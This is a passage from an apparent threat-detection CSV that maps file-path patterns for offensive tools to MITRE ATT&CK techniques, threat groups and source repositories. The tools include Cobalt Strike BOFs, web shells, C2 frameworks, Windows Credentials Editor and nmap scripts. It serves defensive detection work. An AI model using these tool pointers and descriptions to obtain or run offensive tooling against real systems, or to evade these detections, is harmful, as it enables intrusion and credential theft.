TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VNCHooks.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vnc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vnik_v1.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vpc__enum_lateral_movement*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/vss-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/vssenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/vulnscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/vulnserver.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/waf__enum/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/wapitiCore/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/wapiti-scanner/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/Watson.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*/wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*/wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" +"*/wdb-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/wdextract.cpp*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/wdextract.cpp*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/WDExtract.git*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/WdToggle.c*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*/WdToggle.h*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"*/weakpass.git*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" +"*/Web/decouverte.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/Web/discovery.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/web/pwn.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" +"*/web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/web_rce.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/WebC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/webdav.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/WebDavC2.git*","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","116","72","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" +"*/web-hacking-toolkit*","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","142","29","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" +"*/weblistener.py*","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1071 T1090 T1102","N/A","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","10","10","702","158","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z" +"*/weblogic-t3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/webshell.py*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/webshell/*.aspx*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*/webshell/*.jsp*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*/webshell/*.php*","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","10","10","1283","212","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z" +"*/webshells/shell.aspx*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/webshells/shell.php*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/WebSocketC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","432","99","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" +"*/Weevely*","offensive_tool_keyword","weevely","weevely php web shell","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/sunge/Weevely","1","0","N/A","N/A","1","41","113","2012-04-19T18:00:08Z","2012-05-04T13:17:42Z" +"*/Weevely3*","offensive_tool_keyword","Weevely3","Webponized web shell","T1100 - T1102 - T1059 - T1071 - T1056","TA0002 - TA0003","N/A","N/A","Web Attacks","https://github.com/epinna/weevely3","1","0","N/A","N/A","10","2909","606","2023-06-21T14:41:31Z","2014-09-20T10:16:49Z" +"*/well_known_sids.py*","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1595 T1590 T1591","TA0001 - TA0002 - TA0007 - TA0008 - TA0011","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","6","532","88","2023-07-19T16:21:49Z","2019-03-27T18:36:41Z" +"*/WerTrigger.git*","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","147","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" +"*/WfpTokenDup.exe*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*/whatlicense.git*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*/WheresMyImplant/*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/whoami.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/WhoAmI.task*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/whois-domain.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/whois-ip.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 